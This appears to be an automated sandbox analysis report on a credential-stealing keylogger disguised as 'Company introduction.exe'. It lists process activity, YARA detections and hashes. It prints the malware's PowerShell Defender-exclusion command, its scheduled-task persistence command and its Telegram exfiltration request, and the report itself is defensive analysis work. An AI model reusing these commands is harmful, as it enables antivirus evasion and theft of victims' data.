2025-01-15 07:39:16 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49773 | 149.154.167.220 | 443 | 8144 | C:\Users\user\AppData\Roaming\FzXKnGk.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:17 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:14:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-01-15 07:39:17 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Wed, 15 Jan 2025 07:39:17 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-15 07:39:17 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Target ID: 0
Start time: 02:38:58
Start date: 15/01/2025
Path: C:\Users\user\Desktop\Company introduction.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Company introduction.exe"
Imagebase: 0xda0000
File size: 854'528 bytes
MD5 hash: 10F72E53A2C9F106093C233B56A3A819
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:02:39:00
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:02:39:01
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:02:39:01
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"
                                                                                                                                                  Imagebase:0xb00000
                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:02:39:01
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:02:39:01
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Company introduction.exe"
                                                                                                                                                  Imagebase:0xbc0000
                                                                                                                                                  File size:854'528 bytes
                                                                                                                                                  MD5 hash:10F72E53A2C9F106093C233B56A3A819
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:02:39:02
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                  File size:854'528 bytes
                                                                                                                                                  MD5 hash:10F72E53A2C9F106093C233B56A3A819
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 34%, ReversingLabs
                                                                                                                                                  • Detection: 29%, Virustotal, Browse
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:02:39:03
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                                                  File size:496'640 bytes
                                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:02:39:03
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp"
                                                                                                                                                  Imagebase:0xb00000
                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:02:39:03
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:02:39:04
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\FzXKnGk.exe"
                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                  File size:854'528 bytes
                                                                                                                                                  MD5 hash:10F72E53A2C9F106093C233B56A3A819
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:12
                                                                                                                                                  Start time:02:39:04
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\FzXKnGk.exe"
                                                                                                                                                  Imagebase:0xed0000
                                                                                                                                                  File size:854'528 bytes
                                                                                                                                                  MD5 hash:10F72E53A2C9F106093C233B56A3A819
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false


                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:12.2%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:3.9%
                                                                                                                                                    Total number of Nodes:232
                                                                                                                                                    Total number of Limit Nodes:12
                                                                                                                                                    Execution graph: interactive node/edge widget (232 nodes) not reproduced. Windows API calls named at the graph nodes: DuplicateHandle, CreateActCtxA, KiUserCallbackDispatcher, CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread, PostMessageW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, GetModuleHandleW.

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Pp^q$d
                                                                                                                                                    • API String ID: 0-2169010058
                                                                                                                                                    • Opcode ID: 3925614c5186458ca8fd4ae210988a0f98b12c90d939f89cc94ad6718a8e86b4
                                                                                                                                                    • Instruction ID: 3b70357d44bd038a75ab9b322fbab62d6d1acd61682967fb1c151a4583cf1876
                                                                                                                                                    • Opcode Fuzzy Hash: 3925614c5186458ca8fd4ae210988a0f98b12c90d939f89cc94ad6718a8e86b4
                                                                                                                                                    • Instruction Fuzzy Hash: 7E62D174A00229CFCB65DF68C994AD9BBB1FF99300F0085E9D549A7364DB30AE95CF90

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Pp^q$d
                                                                                                                                                    • API String ID: 0-2169010058
                                                                                                                                                    • Opcode ID: a7b8abec283c9e109d24563cddcf2d8205cbd3dac4d6063e20bbc62c189324b4
                                                                                                                                                    • Instruction ID: 7349dc52c04d833da14d79afd4b28ef4cb656a29bc8269fb92376e5dc92c77fb
                                                                                                                                                    • Opcode Fuzzy Hash: a7b8abec283c9e109d24563cddcf2d8205cbd3dac4d6063e20bbc62c189324b4
                                                                                                                                                    • Instruction Fuzzy Hash: A362D074A00229CFCB25DF68C994AD9BBB1FF99300F0085EAD549A7365DB30AE95CF50

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Pp^q$d
                                                                                                                                                    • API String ID: 0-2169010058
                                                                                                                                                    • Opcode ID: a2fddfc72944203c132fbab37c596b4390c642b18dcb9d2f1afdfac2da0d968e
                                                                                                                                                    • Instruction ID: baaec17d604cb58e9fc1cd69eee14a9397f4107095d629a1fcfb39022de35b31
                                                                                                                                                    • Opcode Fuzzy Hash: a2fddfc72944203c132fbab37c596b4390c642b18dcb9d2f1afdfac2da0d968e
                                                                                                                                                    • Instruction Fuzzy Hash: 7252D074A00229CFCB65DF68C994AD9BBB2FF99300F0085E9D549A7364DB30AE95CF50

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Pp^q$d
                                                                                                                                                    • API String ID: 0-2169010058
                                                                                                                                                    • Opcode ID: 53dd89ad3f6f3caae304369bdff97ca0d2fa2f44d0058ff6cc928c099c62552d
                                                                                                                                                    • Instruction ID: 540f10692913aea09d18421d28dc7b4bbe25657aac62dc01a39bffd1dc792be8
                                                                                                                                                    • Opcode Fuzzy Hash: 53dd89ad3f6f3caae304369bdff97ca0d2fa2f44d0058ff6cc928c099c62552d
                                                                                                                                                    • Instruction Fuzzy Hash: 4F62D074A00229CFCB65DF68C984AD9BBB2FF99300F0085E9D549A7364DB70AE95CF50
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 5{
                                                                                                                                                    • API String ID: 0-2291050889
                                                                                                                                                    • Opcode ID: f119d799eb5b3fefc719cb06b7248bfb5239311b02301375536747053e60774f
                                                                                                                                                    • Instruction ID: 6ab407390130918ca571287db68b675844ecbb338b0b0484b63f3e792befeb5f
                                                                                                                                                    • Opcode Fuzzy Hash: f119d799eb5b3fefc719cb06b7248bfb5239311b02301375536747053e60774f
                                                                                                                                                    • Instruction Fuzzy Hash: 05B16874E01209DFCB04DFE9D5854AEBBB6FF89300F20956AE815AB364DB349902CF65
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 5{
                                                                                                                                                    • API String ID: 0-2291050889
                                                                                                                                                    • Opcode ID: 0715ef34f9cd8e714a1101060c5708612865c858b5214f2f0aa53003aad00ec5
                                                                                                                                                    • Instruction ID: 29efeb4a86ad26a0825b61942995cbe912d591bc6ea022e502be64e3b36ddaa5
                                                                                                                                                    • Opcode Fuzzy Hash: 0715ef34f9cd8e714a1101060c5708612865c858b5214f2f0aa53003aad00ec5
                                                                                                                                                    • Instruction Fuzzy Hash: 24A14874E01209DFCB04DFE9D5854AEBBB6FF89300F20946AE416AB364DB349902CF65
Strings
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID: j4$y
• API String ID: 0-2391584009
Strings
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID: j4$y
• API String ID: 0-2391584009
Memory Dump Source
• Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32 ref: 014BE87E
• GetCurrentThread.KERNEL32 ref: 014BE8BB
• GetCurrentProcess.KERNEL32 ref: 014BE8F8
• GetCurrentThreadId.KERNEL32 ref: 014BE951
Memory Dump Source
• Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

Control-flow Graph
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07E90DF6
Memory Dump Source
• Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0

Control-flow Graph
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07E90DF6
Memory Dump Source
• Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
                                                                                                                                                    • Opcode ID: 4729a35ec6274b5eaf6588b502dfaad1479f88aee70e660e6f44119ef735f1f7
                                                                                                                                                    • Instruction ID: 6b40241be75466165d654522eab4b5285532c923875a5daa00d41ea79b984640
                                                                                                                                                    • Opcode Fuzzy Hash: 4729a35ec6274b5eaf6588b502dfaad1479f88aee70e660e6f44119ef735f1f7
                                                                                                                                                    • Instruction Fuzzy Hash: 07915CB2D0121ADFDF20CF69C8407DDBBB2BF48314F5485A9E809A7250DB749985CF92
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 014B5E51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 47a73b7689cd188e2f5f502c2894301e4e27969db15226faf524462c560920d4
                                                                                                                                                    • Instruction ID: 9e419ed9a3f731c3a55a3c27faeca5a531e9928f8e5b26dfd8cbea45ddb3431f
                                                                                                                                                    • Opcode Fuzzy Hash: 47a73b7689cd188e2f5f502c2894301e4e27969db15226faf524462c560920d4
                                                                                                                                                    • Instruction Fuzzy Hash: E341B2B0C00619CFDB24DFA9C984BDEFBB5BF48314F24816AD408AB265DB756946CF90
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 014B5E51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 2948b670b2d83bc8bd4b13b77cbc039a5e1c93350b10fd75085b8a6c12f66ea9
                                                                                                                                                    • Instruction ID: 89be1394a15c7da91a6523cc4e636fd495fdaa871536ecd787ec28d07f89e07a
                                                                                                                                                    • Opcode Fuzzy Hash: 2948b670b2d83bc8bd4b13b77cbc039a5e1c93350b10fd75085b8a6c12f66ea9
                                                                                                                                                    • Instruction Fuzzy Hash: 0341D2B0C00619CFDB24DFA9C9847DEFBB5BF49304F24806AD408AB265DB756946CF90
                                                                                                                                                    APIs
                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07E909C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3559483778-0
